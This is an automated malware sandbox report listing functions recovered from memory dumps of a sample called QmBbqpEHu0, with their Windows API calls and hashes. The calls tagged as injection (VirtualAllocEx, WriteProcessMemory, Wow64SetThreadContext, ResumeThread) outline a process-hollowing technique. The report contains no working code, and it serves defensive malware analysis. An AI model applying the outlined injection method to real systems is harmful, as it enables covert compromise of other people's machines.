                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 0fbd4ec781777269a011da0575ad85a78ad600a28ad050aaa49f792054d4516c
                                                                                                                                      • Instruction ID: e00ac4abfbea1e1b259063d23126da020407ae3b060798824a59380333ddac46
                                                                                                                                      • Opcode Fuzzy Hash: 0fbd4ec781777269a011da0575ad85a78ad600a28ad050aaa49f792054d4516c
                                                                                                                                      • Instruction Fuzzy Hash: DA4101B0D00718CBDB24CFA9C884BCEBBF6BF88314F60816AD409AB255DB716945CF90
                                                                                                                                      Function 027A5A84 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f3559639df375468324c7e49fd35171dad0663a01e16c185bb090f7e563d7e63
                                                                                                                                      • Instruction ID: ed7e2aae945589f241fdc832289aa2a50fe0b5ca080193c610345b51637d65f6
                                                                                                                                      • Opcode Fuzzy Hash: f3559639df375468324c7e49fd35171dad0663a01e16c185bb090f7e563d7e63
                                                                                                                                      • Instruction Fuzzy Hash: 1231BEB1D04248CEDF11CBA8C86879DBBF1BF45328F944289C4166B255DB75A946CF41
                                                                                                                                      Function 0765A4F0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0765A588
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                      • Opcode ID: 35a60a1b3a195300313d0ca95b2acbcff5c052b9cfbaeb6a968f323e714df061
                                                                                                                                      • Instruction ID: 2fb74ccb59d6bd328f2a66a5c7eac756bec7e17f9db4bc7addbc4ae1d7ebe768
                                                                                                                                      • Opcode Fuzzy Hash: 35a60a1b3a195300313d0ca95b2acbcff5c052b9cfbaeb6a968f323e714df061
                                                                                                                                      • Instruction Fuzzy Hash: 062117B19003499FCF10CFA9C985BDEBBF5FF48320F10842AE919A7240D7789544DBA1
                                                                                                                                      Function 07470040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074700D7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DrawText
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                      • Opcode ID: cfbc0a730820a7fd837542a27666a73776604be26a46b4dc268e8783a165ef77
                                                                                                                                      • Instruction ID: 77cbbd3d7e905bfe968d5747f6313f7da480476757299a9146467bd62b3d7c0a
                                                                                                                                      • Opcode Fuzzy Hash: cfbc0a730820a7fd837542a27666a73776604be26a46b4dc268e8783a165ef77
                                                                                                                                      • Instruction Fuzzy Hash: 4F21A0B5D012499FDB10CF9AD884ADEFBF5FB48320F14842AE919A7310D775A944CFA0
                                                                                                                                      Function 0765A4F8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0765A588
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                      • Opcode ID: ba4eb0fde9d81b4c5a5fdd3dd0f6a6883df130b458a012b20089006087293543
                                                                                                                                      • Instruction ID: ea58c8deadab04573fcddf445a988eaf4668e569bc2b48d3b89f5f6f444c9617
                                                                                                                                      • Opcode Fuzzy Hash: ba4eb0fde9d81b4c5a5fdd3dd0f6a6883df130b458a012b20089006087293543
                                                                                                                                      • Instruction Fuzzy Hash: 7B2127B19003499FCB10CFAAC985BDEBBF5FF48320F10842AE919A7340D7789944DBA1
                                                                                                                                      Function 07659B20 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07659BA6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                      • Opcode ID: 6652d0ee3512f212c0413864554e90d7567d60b25b609bdc5ddd54da3e2b67fb
                                                                                                                                      • Instruction ID: 48c82b7a682e76e6b21fccae026330b502b65e052aa645ef33b32d770a9c81a7
                                                                                                                                      • Opcode Fuzzy Hash: 6652d0ee3512f212c0413864554e90d7567d60b25b609bdc5ddd54da3e2b67fb
                                                                                                                                      • Instruction Fuzzy Hash: FF212AB1D003098FDB10DFAAC4857EEBBF5EF48320F14842AD419A7241D778A945DBA1
                                                                                                                                      Function 027AD070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027AD76E,?,?,?,?,?), ref: 027AD82F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: a1b8d2b696f0dadef925d383c3c2c83f29a8b734e97678df15783d0a68add881
                                                                                                                                      • Instruction ID: dc3dfb942374952bbcbaa27661ad093fcfa5d2edaa9f998924ff5faba0578ab4
                                                                                                                                      • Opcode Fuzzy Hash: a1b8d2b696f0dadef925d383c3c2c83f29a8b734e97678df15783d0a68add881
                                                                                                                                      • Instruction Fuzzy Hash: F821E5B5D00249AFDB10CF9AD584ADEBBF5EB48324F14845AE918A7310D374A944CFA1
                                                                                                                                      Function 027AD7A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027AD76E,?,?,?,?,?), ref: 027AD82F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 9c69939bd14cdbc1bd99a484e6ec1931589f51a7267fd040b84f39992428e8c4
                                                                                                                                      • Instruction ID: a5a3c475cdc9784a69d05e218fbbd2c5993564fb1e0cd6e1341edea4374de02a
                                                                                                                                      • Opcode Fuzzy Hash: 9c69939bd14cdbc1bd99a484e6ec1931589f51a7267fd040b84f39992428e8c4
                                                                                                                                      • Instruction Fuzzy Hash: BF21E5B5D00249EFDB10CF9AD984ADEBFF9EB48720F14855AE918A3311D374A944CF61
                                                                                                                                      Function 0765A5E1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0765A668
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                      • Opcode ID: 06977e5f4624a6d0ff127e8704900d4bccd9fb1309f6d7613cf0c7745d05df58
                                                                                                                                      • Instruction ID: db1a6744c6b0e2ea53291ae6ced6c7279c5b05a36196d0bfa855ee24921011c9
                                                                                                                                      • Opcode Fuzzy Hash: 06977e5f4624a6d0ff127e8704900d4bccd9fb1309f6d7613cf0c7745d05df58
                                                                                                                                      • Instruction Fuzzy Hash: CE2148B1D002499FCB10CFAAC981ADEBBF5FF48320F10842AE919A7240C7789540DBA1
                                                                                                                                      Function 0765A5E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0765A668
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                      • Opcode ID: 677363a68214be1904729c418582df6a6e9e2547188cfbe7a2e19e8d236d48af
                                                                                                                                      • Instruction ID: d723a8ef574a0c24bfdf5f84b4a304ba73808eb25380861adf936e8ce403ccb1
                                                                                                                                      • Opcode Fuzzy Hash: 677363a68214be1904729c418582df6a6e9e2547188cfbe7a2e19e8d236d48af
                                                                                                                                      • Instruction Fuzzy Hash: 652139B1D003499FCB10CFAAC881ADEFBF5FF48320F10852AE919A7240D7789540DBA1
                                                                                                                                      Function 07659B28 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07659BA6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                      • Opcode ID: 2366aa5f2d39a76f8ccdb986720d19dc37c451fcf70504c939eb2ed016e3ee04
                                                                                                                                      • Instruction ID: 43613e60dc04972d017915e3c7bda0bc208934e5aeae5ad58a32e7835097438b
                                                                                                                                      • Opcode Fuzzy Hash: 2366aa5f2d39a76f8ccdb986720d19dc37c451fcf70504c939eb2ed016e3ee04
                                                                                                                                      • Instruction Fuzzy Hash: DA2109B1D003098FDB10DFAAC4857AEBBF5EF88324F148429D519A7241D778A945DFA1
                                                                                                                                      Function 0747DA0A Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747DA83
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 272c4346022b53bf181d4fc52cd63ca4a6efcb49a38c88ea4addb912712b7296
                                                                                                                                      • Instruction ID: ce36d37faaca666444ce31ea9a5221e96a1969c79bdf9d3c961e817d42646fe6
                                                                                                                                      • Opcode Fuzzy Hash: 272c4346022b53bf181d4fc52cd63ca4a6efcb49a38c88ea4addb912712b7296
                                                                                                                                      • Instruction Fuzzy Hash: F021F4B6D002499FCB10CF9AD485BDEFBF8FB48320F10842AE958A7651D378A545DFA1
                                                                                                                                      Function 0765A430 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0765A4A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: ac27d4f57f28b9d43551f6be9057feaf3ca356cee4fa52e1724b5096d83dd59e
                                                                                                                                      • Instruction ID: fd9f273062d78c8736b3b7b9c9c24481109c62b610c8b033391802581e6721c5
                                                                                                                                      • Opcode Fuzzy Hash: ac27d4f57f28b9d43551f6be9057feaf3ca356cee4fa52e1724b5096d83dd59e
                                                                                                                                      • Instruction Fuzzy Hash: C41129B29002499FCB20DFAAC845ADFBFF5EF88320F248419E519A7250C775A544DFA1
                                                                                                                                      Function 0747DA10 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747DA83
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: d57e939c09b976702a1de2aa819e9446db795ea45c53f91f07072002df689e24
                                                                                                                                      • Instruction ID: 912c5a5f21344cb13574d079c4f1fcaaf7c460fb690ae24f1d8aea03b0eb7b60
                                                                                                                                      • Opcode Fuzzy Hash: d57e939c09b976702a1de2aa819e9446db795ea45c53f91f07072002df689e24
                                                                                                                                      • Instruction Fuzzy Hash: FE21C2B5D042499FCB10CF9AC985ADEFBF8FB48320F10842AE958A7251D378A544DFA1
                                                                                                                                      Function 0765A438 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0765A4A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 31a7a1941961b83e3ff03b51ace428764bd3fe38e309d031e2638ec209d8e415
                                                                                                                                      • Instruction ID: d00ab866a073754b59d7dd37e479c8cbc56071e655f2d69a46dee34c02859f99
                                                                                                                                      • Opcode Fuzzy Hash: 31a7a1941961b83e3ff03b51ace428764bd3fe38e309d031e2638ec209d8e415
                                                                                                                                      • Instruction Fuzzy Hash: 6B110AB19002499FDF10DFAAC845ADEBFF5EF88320F148419E519A7250C7759544DFA1
                                                                                                                                      Function 07659A70 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: 71c30e69b71c5412d3bb8efb2d0caaf4423d2e104c9ed782d677b1540b24a664
                                                                                                                                      • Instruction ID: 721619bb87379ebcbe62d19cf38fd42637dabda76042824abfd2adf917a29768
                                                                                                                                      • Opcode Fuzzy Hash: 71c30e69b71c5412d3bb8efb2d0caaf4423d2e104c9ed782d677b1540b24a664
                                                                                                                                      • Instruction Fuzzy Hash: F11176B59003498EDB20DFAAC4457DEFFF4AF88320F24881AD459A7340CB75A580CBA1
                                                                                                                                      Function 07659A78 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: 4357fe8caeb253328dfd22e636b2e3d866cdc1fc98a4f08fb1a69273253eb91f
                                                                                                                                      • Instruction ID: 8c8553e601e85e19bec1de834dd208dea70615a8f9de9fbd3842714ba93b0e6b
                                                                                                                                      • Opcode Fuzzy Hash: 4357fe8caeb253328dfd22e636b2e3d866cdc1fc98a4f08fb1a69273253eb91f
                                                                                                                                      • Instruction Fuzzy Hash: 231128B1D003498FDB20DFAAC44579EFBF5EF88324F248419D519A7340CB75A540CBA5
                                                                                                                                      Function 027AB4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 027AB546
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: 4faa0d86ef6c0b6a2b4cd314ed1c83da0ce57c6169523423d0e30404bb6c006a
                                                                                                                                      • Instruction ID: c97b87dbf4264a0bb61275a9f57c12f2cdf71ff44243836388b7a4a468aa7871
                                                                                                                                      • Opcode Fuzzy Hash: 4faa0d86ef6c0b6a2b4cd314ed1c83da0ce57c6169523423d0e30404bb6c006a
                                                                                                                                      • Instruction Fuzzy Hash: CD1110B6C002498FCB10CF9AC444ADEFBF4EF88324F20852AD428B7200C379A545CFA1
                                                                                                                                      Function 0765A0C0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0765CFBD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePost
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                      • Opcode ID: ea7758c2b2aa50d2a684c35c74ef2673114cef3589b30bd92e80d3c497bccac9
                                                                                                                                      • Instruction ID: cf76196e744fbc22660e19ae24564e16f406b8be5b52f2a903c3a8c47b41d3e4
                                                                                                                                      • Opcode Fuzzy Hash: ea7758c2b2aa50d2a684c35c74ef2673114cef3589b30bd92e80d3c497bccac9
                                                                                                                                      • Instruction Fuzzy Hash: 3011F5B58043499FDB10DF9AC845BDEFBF8EB48324F24845AE919A7300C3B5A944CFA5
                                                                                                                                      Function 0765CF5A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0765CFBD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePost
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                      • Opcode ID: 589598c9701fc0f2974edc16b283fe676b218e155116eff29c2ab8b162c2d5a1
                                                                                                                                      • Instruction ID: 18a7f2d19ddae5c0b9aa434012a5a6160564b938ffeb06d871c55e9f0b3e415a
                                                                                                                                      • Opcode Fuzzy Hash: 589598c9701fc0f2974edc16b283fe676b218e155116eff29c2ab8b162c2d5a1
                                                                                                                                      • Instruction Fuzzy Hash: C611C2B58003499FDB10DF9AD985BDEBBF8EB48324F24845AE919A7600C375A544CFA1
                                                                                                                                      Function 00C6D658 Relevance: .1, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3589269720.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_c6d000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 147892071b2551ffebd2fe03fe28af2a7e7c79e83f5a2539aaac1b1cb4aa6831
                                                                                                                                      • Instruction ID: 2fb1f1885c9764e07a23cc2ca20be476e4a272f41708b7aef999c701c28340b7
                                                                                                                                      • Opcode Fuzzy Hash: 147892071b2551ffebd2fe03fe28af2a7e7c79e83f5a2539aaac1b1cb4aa6831
                                                                                                                                      • Instruction Fuzzy Hash: 692137B5A04240DFCB25DF14D9C0F26BF65FB98314F24C96DE90A0B25AC336D856DBA2
                                                                                                                                      Function 00C7D1B4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9a60932c734675b4fd07d0d61545c5b5259df47c5cd384377816ffb883a41180
                                                                                                                                      • Instruction ID: 61c590cb644237a9487241b41b34ab34a1d61fd65732b1688e69285273ad012d
                                                                                                                                      • Opcode Fuzzy Hash: 9a60932c734675b4fd07d0d61545c5b5259df47c5cd384377816ffb883a41180
                                                                                                                                      • Instruction Fuzzy Hash: 6921FFB1604200AFCB05DF14D9C0B26BBB5FF84324F24C9ADE84E4B292C33ADC46CA61
                                                                                                                                      Function 00C7D36C Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 53acbad9bd016052f95c47a75c46d3025a39675c09446f83be2d8a75526b410c
                                                                                                                                      • Instruction ID: 9be9c43dc782198673739cf5f570edaa2f23ed41ffd2ac520197e4055320da1d
                                                                                                                                      • Opcode Fuzzy Hash: 53acbad9bd016052f95c47a75c46d3025a39675c09446f83be2d8a75526b410c
                                                                                                                                      • Instruction Fuzzy Hash: 0A21F2B5504204DFCB04DF14D9C0B26BB75FF84314F24C96DE90E4B296C336E846CA62
                                                                                                                                      Function 00C6D653 Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3589269720.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_c6d000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                      • Instruction ID: 06c36d2f4b1fec6fc96334acfd24833fc09550ffe64c093e907e18202be19905
                                                                                                                                      • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                      • Instruction Fuzzy Hash: A711E976904280CFCB15CF14D5C4B16BF72FB94314F24C5A9D90A4B65AC336D556CBA2
                                                                                                                                      Function 00C7D367 Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_c7d000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                      • Instruction ID: 31f4257357009076a87f8c19e66e2eb6e9ff9b1c734e381e245b394bac32870e
                                                                                                                                      • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                      • Instruction Fuzzy Hash: EE118E75504240DFDB15CF14D5C4B15BB72FF84318F24C6A9D84A4B656C33AE94ACB51
                                                                                                                                      Function 00C7D1AF Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3589964830.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
